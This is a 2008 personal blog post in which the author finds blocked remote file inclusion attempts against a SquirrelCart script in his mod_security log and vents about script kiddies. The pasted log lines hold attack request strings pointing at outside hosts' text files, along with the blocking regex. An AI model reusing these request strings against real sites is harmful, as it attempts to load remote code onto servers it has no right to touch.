Do you check your log files?

by keif on September 8, 2008

Over the past few days, I’ve been having a helluva time with Dreamhost (my host) and a slow connection.

I tweeted about it. A lot. Twitter helps me vent, m’kay?

OMG, like what did you do?

Well, I figured Dreamhost had bitten off more than it could chew – and I still wonder about it, since they’re offering “unlimited everything” yet my server is under constant overload. For months.

Once it was finally back up, and I installed a new theme (see my footer? Thesis? Very cool), I started poking around in my log files because my brand-spankin’-new theme was being all screwy.

That’s when I noticed this little gem:

[Sat Sep 06 22:20:11 2008] [error] [client 75.127.70.16] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "dOpSw9BhtwYAAAAlJCcAAAAQ"]

[Sat Sep 06 22:20:11 2008] [error] [client 75.127.70.16] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "dO0Bl9BhtwYAAFGfJx8AAAAH"]

[Sat Sep 06 22:23:46 2008] [error] [client 85.17.6.7] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "gbt0DNBhtwYAAHmKI-oAAAAK"]

[Sat Sep 06 22:23:46 2008] [error] [client 85.17.6.7] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "gcDBS9BhtwYAAF5AN8sAAAAW"]

[Sat Sep 06 22:35:24 2008] [error] [client 81.182.252.176] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://www.venturesnowboards.com/blid.txt????"] [unique_id "q1bSu9BhtwYAAHBNTxoAAAAD"]

[Sat Sep 06 22:56:20 2008] [error] [client 81.182.252.176] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://www.venturesnowboards.com/blid.txt????"] [unique_id "9jfE6NBhtwYAAAAlJCsAAAAQ"]

[Sat Sep 06 22:56:20 2008] [error] [client 81.182.252.176] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://www.venturesnowboards.com/blid.txt????"] [unique_id "9j3cHtBhtwYAAFGfJyMAAAAH"]

[Sat Sep 06 23:14:03 2008] [error] [client 62.210.139.66] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "NZeHB9BhtwYAAG6hI-oAAAAM"]

[Sat Sep 06 23:14:05 2008] [error] [client 62.210.139.66] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "NbcYLNBhtwYAAE5XJCEAAAAP"]

[Sat Sep 06 23:14:07 2008] [error] [client 62.210.139.66] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "NdVvSNBhtwYAAF4FlRcAAAAB"]

[Sat Sep 06 23:14:07 2008] [error] [client 62.210.139.66] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "NdVyIdBhtwYAAFxmJCoAAAAO"]

All I could do is just stare blankly and say “what the fuc|<?!”

Thankfully, my son was asleep and didn’t witness my temper tantrum.

Hackers? Hardly.

I believe the term is “script kiddies” – I’m no hacker by any means myself, but from what I dug up about their “attack” it was using a cheap-ass script to try and execute vulnerabilities. And I noticed SquirrelCart in there as well – how the hell can I not escape Squirrel Cart? Why don’t clients ever listen when you say “it would be beneficial to upgrade?” I digress…

The “Hackers” were UNITED ALBANIANS aka ALBOSS PARADISE and a quick google search turns up a number of other failed attempts:

Comments on this entry are closed.

Previous post:

Next post: